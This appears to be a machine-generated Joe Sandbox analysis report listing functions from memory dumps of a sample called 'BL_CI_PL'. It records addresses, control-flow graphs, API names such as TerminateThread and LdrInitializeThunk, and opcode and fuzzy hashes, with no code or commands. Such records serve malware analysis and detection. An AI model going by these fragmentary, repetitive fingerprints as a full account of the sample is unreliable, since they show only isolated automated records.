                                                                                                                                                      Function 1E8F2DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
                                                                                                                                                      • Instruction ID: a00baf8296fbb468db3daf362860aa2f7f1454433f10f95d11190ab9ac975d69
                                                                                                                                                      • Opcode Fuzzy Hash: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
                                                                                                                                                      • Instruction Fuzzy Hash: 1990027130150402D550B159450478A405947D0701FD1C519A9158D14EC6698DD57A65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
                                                                                                                                                      • Instruction ID: bb6a4024f2017a34cfc1f4814ae16b068fc93babc8f020a9c9338f631b269f39
                                                                                                                                                      • Opcode Fuzzy Hash: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
                                                                                                                                                      • Instruction Fuzzy Hash: 0D90023130150413D521A159460474B405D47D0741FD1C91AA4518D18DD6668952B521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 204 1e8f2b90-1e8f2b9c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
                                                                                                                                                      • Instruction ID: 4b742aeb5026e91c5a9a33e210505aa15ab5721915a6c4c57b21e789e4e78218
                                                                                                                                                      • Opcode Fuzzy Hash: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
                                                                                                                                                      • Instruction Fuzzy Hash: A290023130158802D520A159850478E405947D0701FD5C919A8518E18DC6A588917521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 205 1e8f2bc0-1e8f2bcc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 1c8faafa5530f8ab9c7cd49f9753aa36ac2935f79125354e30b8f58155ed492d
                                                                                                                                                      • Instruction ID: 7c2180952b4588369f620d5a3051feb48126f6e40b79377f9a824dd0cc8ebc35
                                                                                                                                                      • Opcode Fuzzy Hash: 1c8faafa5530f8ab9c7cd49f9753aa36ac2935f79125354e30b8f58155ed492d
                                                                                                                                                      • Instruction Fuzzy Hash: 2090023130150402D510A599550868A405947E0701FD1D519A9118D15EC67588917531
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2B10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 203 1e8f2b10-1e8f2b1c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
                                                                                                                                                      • Instruction ID: b1c29bfbe79d8c591d80c50f712eb090dd4a7910186f19a6a26d8553c4164bc6
                                                                                                                                                      • Opcode Fuzzy Hash: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
                                                                                                                                                      • Instruction Fuzzy Hash: F990023130150802D590B159450468E405947D1701FD1C51DA4119E14DCA258A597BA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F29F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 202 1e8f29f0-1e8f29fc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 766ae6bffc3112461a712c6e116a46ae97ac8276ffb42eb09fcdab8483fc5b4e
                                                                                                                                                      • Instruction ID: ce9b4d30fc8f4c67f696228a57aeeb86a86fd102de52df3d6b7a77a6e3234016
                                                                                                                                                      • Opcode Fuzzy Hash: 766ae6bffc3112461a712c6e116a46ae97ac8276ffb42eb09fcdab8483fc5b4e
                                                                                                                                                      • Instruction Fuzzy Hash: DA900235311500030515E559070454B409A47D57513D1C529F5109D10CD63188616521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F34E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
                                                                                                                                                      • Instruction ID: 3913ffb1fe9d8d599cac7747ae93cb5086c55f435a4f89ac06b1f09a5a83deed
                                                                                                                                                      • Opcode Fuzzy Hash: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
                                                                                                                                                      • Instruction Fuzzy Hash: 3290023170560402D510A159461474A505947D0701FE1C919A4518D28DC7A5895179A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0057395E, Relevance: 1.7, APIs: 1, Instructions: 167threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 57395e-5739a0 2 5739a1-5739a7 0->2 3 5739db-573ad5 TerminateThread 0->3 4 573945-573959 2->4 5 5739a9-5739d5 2->5 9 573c8d-573ca8 3->9 10 573adb-573aea 3->10 4->2 5->3 10->9 11 573af0-573af4 10->11 11->9 12 573afa-573afe 11->12 12->9 13 573b04-573b08 12->13 13->9 14 573b0e-573b12 13->14 14->9 15 573b18-573b1c 14->15 15->9 16 573b22-573b73 15->16 16->9 18 573b79-573b99 16->18 19 573b9a-573bee 18->19 21 573bf0-573bf9 19->21 22 573c0a-573c88 19->22 21->9 24 573bff-573c00 21->24 24->19
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: deb2125e77c76bc32663392d406669a53b7c2589b09f4257cc0b370ebb1a6dda
                                                                                                                                                      • Instruction ID: 84ea60fa205ace5eb64b0e1e6a0d25fb9c1f2b6a16f5240df6c6f14fdad929fa
                                                                                                                                                      • Opcode Fuzzy Hash: deb2125e77c76bc32663392d406669a53b7c2589b09f4257cc0b370ebb1a6dda
                                                                                                                                                      • Instruction Fuzzy Hash: 83513A366083929FD7128F20E5657E57FA5FF52330F1A859AC8884F4A2C3748E89E742
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573987, Relevance: 1.7, APIs: 1, Instructions: 154threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 25 573987-57398e 26 573990-5739a0 25->26 27 57395b 25->27 28 5739a1-5739a7 26->28 29 5739db-573ad5 TerminateThread 26->29 30 5739a6-5739ae 27->30 31 57395d-57395f 27->31 32 573945-573959 28->32 33 5739a9-5739d5 28->33 39 573c8d-573ca8 29->39 40 573adb-573aea 29->40 35 5739b0-5739d5 30->35 36 573939-573942 30->36 31->25 32->28 33->29 35->29 36->32 40->39 41 573af0-573af4 40->41 41->39 42 573afa-573afe 41->42 42->39 43 573b04-573b08 42->43 43->39 44 573b0e-573b12 43->44 44->39 45 573b18-573b1c 44->45 45->39 46 573b22-573b73 45->46 46->39 48 573b79-573b99 46->48 49 573b9a-573bee 48->49 51 573bf0-573bf9 49->51 52 573c0a-573c88 49->52 51->39 54 573bff-573c00 51->54 54->49
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 16b3b4d72e524b18a8040d676943a000c24133dcfc66e0e1496ce6b26684ff68
                                                                                                                                                      • Instruction ID: 7abbcf70d60703af96087c8766e5ba7b9c80baf8b3a5998c566a29d373bc785b
                                                                                                                                                      • Opcode Fuzzy Hash: 16b3b4d72e524b18a8040d676943a000c24133dcfc66e0e1496ce6b26684ff68
                                                                                                                                                      • Instruction Fuzzy Hash: C54147366083929FD3128F60A2657E57FA0FF52330F5AC6D9C4884F4A3C3648E99E742
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573A0A, Relevance: 1.6, APIs: 1, Instructions: 145threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 55 573a0a-573ad5 TerminateThread 60 573c8d-573ca8 55->60 61 573adb-573aea 55->61 61->60 62 573af0-573af4 61->62 62->60 63 573afa-573afe 62->63 63->60 64 573b04-573b08 63->64 64->60 65 573b0e-573b12 64->65 65->60 66 573b18-573b1c 65->66 66->60 67 573b22-573b73 66->67 67->60 69 573b79-573b99 67->69 70 573b9a-573bee 69->70 72 573bf0-573bf9 70->72 73 573c0a-573c88 70->73 72->60 75 573bff-573c00 72->75 75->70
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: d526be7077c55232c891da846c1440bbdc043cbc9c78e4212fa6f82d49c0f18e
                                                                                                                                                      • Instruction ID: bc08c85ab9d2c9d343e95195effa871b2f444796aed871d6a632edf5ab34a563
                                                                                                                                                      • Opcode Fuzzy Hash: d526be7077c55232c891da846c1440bbdc043cbc9c78e4212fa6f82d49c0f18e
                                                                                                                                                      • Instruction Fuzzy Hash: 1E41A56B50D3525DE3028B10A2667E1BBD4FF55330F2689D6C0484F8A3C3A4CA99E745
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0057393C, Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 100 57393c-573942 101 573945-5739a7 100->101 103 5739a9-573ad5 TerminateThread 101->103 108 573c8d-573ca8 103->108 109 573adb-573aea 103->109 109->108 110 573af0-573af4 109->110 110->108 111 573afa-573afe 110->111 111->108 112 573b04-573b08 111->112 112->108 113 573b0e-573b12 112->113 113->108 114 573b18-573b1c 113->114 114->108 115 573b22-573b73 114->115 115->108 117 573b79-573b99 115->117 118 573b9a-573bee 117->118 120 573bf0-573bf9 118->120 121 573c0a-573c88 118->121 120->108 123 573bff-573c00 120->123 123->118
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 2456ee2d77ed2861a9066b270ca7e5f6ad9bbf2dba428560ec208764dacccbf0
                                                                                                                                                      • Instruction ID: 8667f550440916ec2f7b58409cbcdb413f26ea62607c084faa644e4b1b6eed29
                                                                                                                                                      • Opcode Fuzzy Hash: 2456ee2d77ed2861a9066b270ca7e5f6ad9bbf2dba428560ec208764dacccbf0
                                                                                                                                                      • Instruction Fuzzy Hash: 414146766083429ED7158F10E6697E57BE5FF51330F2AC19AC8884F4A2C3748EC8E706
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 005738E3, Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 76 5738e3-573942 77 573945-5739a7 76->77 79 5739a9-573ad5 TerminateThread 77->79 84 573c8d-573ca8 79->84 85 573adb-573aea 79->85 85->84 86 573af0-573af4 85->86 86->84 87 573afa-573afe 86->87 87->84 88 573b04-573b08 87->88 88->84 89 573b0e-573b12 88->89 89->84 90 573b18-573b1c 89->90 90->84 91 573b22-573b73 90->91 91->84 93 573b79-573b99 91->93 94 573b9a-573bee 93->94 96 573bf0-573bf9 94->96 97 573c0a-573c88 94->97 96->84 99 573bff-573c00 96->99 99->94
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 0e8e244bca17349543c22a38ba8288271ee6f620c17b005617a3f252964833b5
                                                                                                                                                      • Instruction ID: e4b834a99808c24829cc836432caadc5463e9b8e65de938dfda81cc6e4c788c1
                                                                                                                                                      • Opcode Fuzzy Hash: 0e8e244bca17349543c22a38ba8288271ee6f620c17b005617a3f252964833b5
                                                                                                                                                      • Instruction Fuzzy Hash: E831E5316043429FDB248E6498AD7E63BE6AF61370F5AC15ECC895B5A5C3344EC8EB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573A80, Relevance: 1.6, APIs: 1, Instructions: 126threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 124 573a80-573ac2 126 573a45-573a7b TerminateThread 124->126 127 573ac3-573ad5 124->127 126->127 128 573c8d-573ca8 127->128 129 573adb-573aea 127->129 129->128 131 573af0-573af4 129->131 131->128 133 573afa-573afe 131->133 133->128 134 573b04-573b08 133->134 134->128 135 573b0e-573b12 134->135 135->128 136 573b18-573b1c 135->136 136->128 137 573b22-573b73 136->137 137->128 139 573b79-573b99 137->139 140 573b9a-573bee 139->140 142 573bf0-573bf9 140->142 143 573c0a-573c88 140->143 142->128 145 573bff-573c00 142->145 145->140
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 8e4259cf6e0f55c4ebbc8b9d11ecf492ab068b31ab09f5bf45c14b014074aa75
                                                                                                                                                      • Instruction ID: 04626be7a60500f4d69c9dc3410d9ad7c775395f08d9232205b9385961f930d1
                                                                                                                                                      • Opcode Fuzzy Hash: 8e4259cf6e0f55c4ebbc8b9d11ecf492ab068b31ab09f5bf45c14b014074aa75
                                                                                                                                                      • Instruction Fuzzy Hash: 1531F87650C342AED7128B50E2657E1BFE5FF51330F1AC6EAC4884F4A2C3648E89E741
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573962, Relevance: 1.6, APIs: 1, Instructions: 108threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 146 573962-573967 147 57396c-57397d 146->147 148 573969-57396b 146->148 147->146 150 57397f-573982 147->150 148->147 149 573938-573942 148->149 153 573945-573959 149->153 151 5739a1-5739a7 150->151 151->153 154 5739a9-573ad5 TerminateThread 151->154 153->151 159 573c8d-573ca8 154->159 160 573adb-573aea 154->160 160->159 161 573af0-573af4 160->161 161->159 162 573afa-573afe 161->162 162->159 163 573b04-573b08 162->163 163->159 164 573b0e-573b12 163->164 164->159 165 573b18-573b1c 164->165 165->159 166 573b22-573b73 165->166 166->159 168 573b79-573b99 166->168 169 573b9a-573bee 168->169 171 573bf0-573bf9 169->171 172 573c0a-573c88 169->172 171->159 174 573bff-573c00 171->174 174->169
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 7c3a70d7dcd81c978faa07d87a949652088e5ef89a3d63d85cc4c3f497c7897f
                                                                                                                                                      • Instruction ID: 8ddcd0d44c8858b006ed1bc30ba19ea6a6cafe3fc84304b6bbf551d67586afb2
                                                                                                                                                      • Opcode Fuzzy Hash: 7c3a70d7dcd81c978faa07d87a949652088e5ef89a3d63d85cc4c3f497c7897f
                                                                                                                                                      • Instruction Fuzzy Hash: 3B311631604252DFDB248E54D8A97EA3BA6BF51770F5AC16DCC895B096C3344EC8FB02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00573A84, Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 175 573a84-573a89 176 573a8e-573a9f 175->176 177 573a8b-573a8d 175->177 176->175 179 573aa1-573aa4 176->179 177->176 178 573a5a-573a6a TerminateThread 177->178 180 573a71-573a7b 178->180 181 573ac3-573ad5 179->181 180->181 182 573c8d-573ca8 181->182 183 573adb-573aea 181->183 183->182 184 573af0-573af4 183->184 184->182 185 573afa-573afe 184->185 185->182 186 573b04-573b08 185->186 186->182 187 573b0e-573b12 186->187 187->182 188 573b18-573b1c 187->188 188->182 189 573b22-573b73 188->189 189->182 191 573b79-573b99 189->191 192 573b9a-573bee 191->192 194 573bf0-573bf9 192->194 195 573c0a-573c88 192->195 194->182 197 573bff-573c00 194->197 197->192
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: c6f1e5be929f483f9579e3e8ed077372cfd603a31de081788e27fe62399287d9
                                                                                                                                                      • Instruction ID: 2935a12e35e4fb019373a573e57aa9ab3b4d54fb8497dd3697fb2a6d5c38e061
                                                                                                                                                      • Opcode Fuzzy Hash: c6f1e5be929f483f9579e3e8ed077372cfd603a31de081788e27fe62399287d9
                                                                                                                                                      • Instruction Fuzzy Hash: 2821D5356002069FDB258E10D4A9BE57F96BF51774F4AC29DC4890B095C3388EC9FB02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 198 1e8f2b2a-1e8f2b2f 199 1e8f2b3f-1e8f2b46 LdrInitializeThunk 198->199 200 1e8f2b31-1e8f2b38 198->200
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
                                                                                                                                                      • Instruction ID: 0526cdf0536bf8354c8339042182d7e75aed50185f2fbedb0ad8df34d479ccf0
                                                                                                                                                      • Opcode Fuzzy Hash: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
                                                                                                                                                      • Instruction Fuzzy Hash: 77B02B319014C1C5D600D720070870B790467C0B01F51C115D1020A00EC338C090F231
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 1E95FDF4, Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
